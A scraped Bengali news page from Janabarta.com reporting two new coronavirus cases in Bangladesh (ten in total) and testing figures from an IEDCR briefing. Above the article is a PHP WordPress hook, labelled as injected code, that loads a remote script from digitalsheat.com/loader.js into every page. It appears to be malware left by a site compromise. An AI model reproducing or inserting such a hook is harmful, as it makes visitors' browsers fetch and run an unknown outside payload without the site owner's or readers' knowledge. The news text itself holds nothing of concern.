// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site দেশে আরও দুই করোনা রোগী শনাক্ত - Janabarta.com

দেশে আরও দুই করোনা রোগী শনাক্ত

জনবার্তা, স্টাফ রিপোর্টারঃ দেশে আরও দু’জন নতুন করে করোনা ভাইরাসে আক্রান্ত হয়েছেন। সবমিলে এ পর্যন্ত করোনা আক্রান্ত রোগীর সংখ্যা দাঁড়লো ১০ জনে। এদের মধ্যে তিনজন ইতিমধ্যে সুস্থ্য হয়ে বাড়ি ফিরেছেন। আজ আইইডিসিআর-এ নিয়মিত ব্রিফিংয়ে এ তথ্য জানান সংস্থাটির পরিচালক মীরজাদি সেব্রিনা ফ্লোরা।

তিনি বলেন, নতুন আক্রান্ত দু’জনের মধ্যে একজন প্রাতিষ্ঠানিক কোয়ারেন্টিনে থাকা অবস্থায় চিহ্নিত হয়েছেন। অন্যজন বিদেশ ফেরত একজনের সংস্পর্শে এসে আক্রান্ত হন । তাকে হাসপতালে আনা হয়েছে।

মীরজাদি আরও জানান, এ পর্যন্ত নমুনা পরীক্ষা করা হয়েছে ২৭৭ জনের।

আর গত ২৪ ঘণ্টায় ৩৬ জনের নমুনা পরীক্ষা করা হয়। এছাড়া আইসোলেশনে আছেন ১৬ জন। হাসপাতালে প্রাতিষ্ঠানিক কোয়ারেন্টিনে আছেন ৪৩ জন।